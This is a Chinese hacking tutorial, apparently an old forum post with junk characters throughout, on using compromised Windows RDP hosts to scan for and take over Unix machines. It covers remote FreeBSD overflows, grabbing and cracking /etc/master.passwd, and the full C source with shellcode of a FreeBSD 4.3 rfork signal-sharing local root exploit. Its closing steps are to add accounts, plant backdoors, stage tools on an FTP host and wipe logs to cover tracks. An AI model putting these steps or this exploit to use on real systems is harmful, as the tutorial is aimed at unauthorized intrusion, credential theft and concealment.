今天的话题是怎么样找unix肉鸡,我想这对于一个有很多windows肉鸡而没有unix肉鸡的人是很有必要。+ s( l" P/ z5 a. |: l
不罗嗦,直入正题。为什么说是我和x-laser一起找肉鸡呢?因为我们的一切操作全部是在3389肉鸡上进行的。首先我们都上到同一个终端,(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理进行id切换(选择用户进行连接)4 Z' A- B" ]1 c1 {% j6 N. u
5 v$ I) ]9 z2 |! h! u. B8 ? 这样,两个人就可以互相控制对方了,一举一动都很清楚,这种方法很好,大大提高了效率,也增加了入侵时的乐趣。建议大家推广 :) 4 n) Q) H/ \4 U2 c; u( Z 下面我们开始工作。由于是在win上搞unix类,所以我们最好要有在win上用的exploit,以得到第一台unix肉鸡。关于在win上用的exploits可以用cygwin编译(在www.isfocus.com)有下载。或者直接去大鹰的主页(e4gle.org)或者红客技术联盟(www.cnhonker.net/old.php)下载,注意了,要一起下那个cygwin1.dll的文件,不然搞不成。& j; R7 o3 n i3 X8 s3 _
现在我们要做的是找出大量unix的肉鸡,然后再去找漏洞,但是怎么找呢?这时候,就请出了我们的languard network scanner,在做了简单的设置让他跑的快点后,我们就开始扫描 H& ~8 ?4 G1 l0 N; X6 K" S, a( q+ L6 C1 T$ B
# h1 v( q* B' }8 m, p+ R3 ^! o, j# N我们扫到了两台linux,….. ..#..’是linux的判断符. # n7 D Q7 U( K( H……..#..’..$则是sunos的判断符,如此等等,大家用用就有经验了. - P. E# Y! ]8 z! \5 R- |: y8 J D* p' L
" H+ U$ S, d: M& K! l1 C: m2 z+ _# Q2 n言归正转,来看我们的freebsd.我们在红盟下好bsd.exe和cygwin1.dll后,就开始溢出了。8 W/ L5 F3 D4 m; W& Y, r# R
; z& U& ^0 Y9 L$ v t( e由于要发送16M的东西,所以可能会慢点8 P, Q+ r2 q2 V/ `
等到成功后,会出现 command ?# e% J! s) X M. o+ ` I. }
这是输入 id: S/ e8 [( `2 }3 m5 s2 d G7 u
可以看到自己已经成为root了。当然,大家还可以把shadow抓下来,bsd下的sh8 `- q( g! Q$ S+ D, j0 I" i
adow文件是/etc/master.passwd,然后john跑个用户名出来(在www.xfocus.net有john的windows下的版本下载,也是用cygwin编译的),再telnet上去,就得到了普通帐号(因为root帐号一般比较难破),再进行本地溢出。为什么要这么麻烦呢?因为我们远程得到的shell很多都没有回显,所以不方便添加帐号。一般在bsd下添加帐号是在/usr/sbin下执行./adduser ,然后按着提示做就可以了,bsd系统很稳定,很多大型网站都是用这个建站,比如红盟。本地溢出的代码我在这里贴一下 $ d }! q0 ]4 B2 n5 v 1 J7 L3 K6 J$ Z# y?受影响版本: FreeBSD 4.3 4.2 4.1 4.0 2 Z: a0 N5 s' S/ q, v
早期版本也许受影响 测试程序使用方法: </P> 3 l/ Q8 q$ p, y' c$ _netdemon%gcc -o vvbsd vvbsd.c netdemon%cp /bin/sh /tmp netdemon%./vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=61056 login: login: # done # </P> 4 J. t& E0 V$ G: X- j; }( m发现 FreeBSD 4.3 存在一个设计上的漏洞,它允许用户在其它进程中插入 signal handlers。 </P> / H; t" ~" J3 @, t8 d* Z# G9 M7 m# Z题出在 rfork(RFPROC|RFSIGSHARE) ,如果子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。 利用此漏洞,本地攻击者能取得 root 权限。 vvfreebsd.c / s0 t" q' z! R& `+ I% w 3 k6 d; c8 |$ n, T1 C# w2 @ ???? /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski http://www.guninski.com */ #include <stdio.h> #include <signal.h> #include <unistd.h> int vv1; #define MYSIG SIGINT //exec "/tm' u: \2 K: \0 }" h6 h
p/sh", shellcode gotten from the internet and modified unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" "\x31\xc0\x50\x50\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; typedef (*PROG)(); extern char **environ; int main(int ac,char **av) { int pid; //(*(PROG)bsdshell)(); if(!(vv1=getenv("vv"))) { setenv("vv",bsdshell,1); if(!execle(av[0],"vv",NULL,environ)) { perror("weird exec"); exit(1); } } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(!(pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) if(!execl("/usr/bin/login","login",0)) { perror("exec setuid failed"); exit(2); }; } sleep(2); signal(MYSIG,(sig_t)vv1); sleep(2); kill(pid,MYSIG); printf("done\n"& X+ _2 W$ ?' Y# A+ m
); while(42); } </P>$ h0 R, r1 a! b5 e6 I
/* www.xcode.tw.st 极端网络安全小组 */* E0 @) E3 L( P4 h
% O/ j' c6 A4 k/ ]
+ Q# b* ~' t3 J$ [) W# O
可以找到可写的地方,然后cat >vv.c 回车( S9 {* b0 h8 `9 h$ f" u- k
(鼠标右健粘贴)* R; D; D- a4 ~8 d( J+ k5 U
ctrl + d保存 . O9 }( B o# }: X9 {8 {/ ?" u% R$gcc –o vv vv.c编译(gcc在solaris和aix等系统下叫做cc)8 ?0 i1 O0 a7 g, W$ m
$cp /bin/csh /tmp: k" o5 F$ d3 W4 f$ Y
$./vv 8 }2 \6 u# ^6 Q0 u7 ]& W7 h$ C) y1 }4 |这样就执行了,一般可以得到root.注意第二句,这是代码的需要1 z$ x; B3 r8 u4 P9 r7 u
然后就去adduser然后再放一堆后门上去吧 y! I0 s) E7 L& U5 Z+ T) ~
几点补充:1.命令w查看当前哪些在线,要是看见root就要小心了0 T& g3 Y+ A2 h N2 a
2 , d) M7 V6 b) V* c% ]% G# g.Whereis gcc查看装了gcc没有,whereis的用法很灵活6 d( z4 X3 T3 \
3如果没装就需要把编译好的传上去,我们一般是申请一个ftp,然后编译好,传到ftp上,在让攻击的机子去下载(51.net的虚拟主机就可以完成这项任务) 8 o }( a" j; C) r k8 ^4记得每次上去要用wipe清理足迹,wipe在小凤居有下载% G9 Z1 |# I$ I2 A. P& ^* H5 [7 N) a
</P>0 w8 R9 w( \8 V2 e' H% U/ Y6 E" { B
另外再附几种常见的exploit的用法. {* w, {% p' H& F1 y